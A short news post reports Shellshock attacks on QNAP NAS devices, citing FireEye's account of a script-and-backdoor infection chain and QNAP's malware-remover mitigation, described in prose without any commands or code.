QNAP NAS latest bash casualty
The bash shellshock vulnerability was first published last week. This week has seen both a flurry of patching and/or disabling of services, and the first exploits. Whilst servers are the main target of bash patching, there has been a growing awareness that other systems that use bash (in particular embedded systems) are also potentially vulnerable. This includes VoIP systems and Network Attached Storage devices.
NAS devices are typically used by businesses for storage of large volumes of data, especially when a server is considered unsuitable for the job. In fact, a NAS can often be used in lieu of a server for a small business. Because a NAS is cheap, but still has many functions expected of a server, it is often used by small businesses (including SOHO businesses). Unfortunately, this may mean it is also an attractive target for would-be attackers.
QNAP is one of the largest NAS vendors. As FireEye reports, some of their NAS devices are also being targeted for attack using the Shellshock bug. The attacks have been observed on NAS devices that are open; so far the attacks have been mostly on devices located in Korea and Japan. The attack tries to get the NAS to download a script that will firstly change the NAS start-up scripts. The script then copies an SSH key, and finally it downloads an ELF binary file. The purpose of downloading the ELF binary is to enable the attacker to use a backdoor to obtain shell access. The FireEye article also contains ways to check whether a QNAP NAS has been hacked in this way.
The penetration of embedded devices running Linux and bash means that further compromises may are possible. The issue with the QNAP Shellshock attack is that an attacker could gain access to the files on the NAS device, making it a potentially dangerous attack. The mitigation strategy (as advised by QNAP) is to install it’s Malware Remover which will “check your NAS system and remove the backdoor once it is identified”.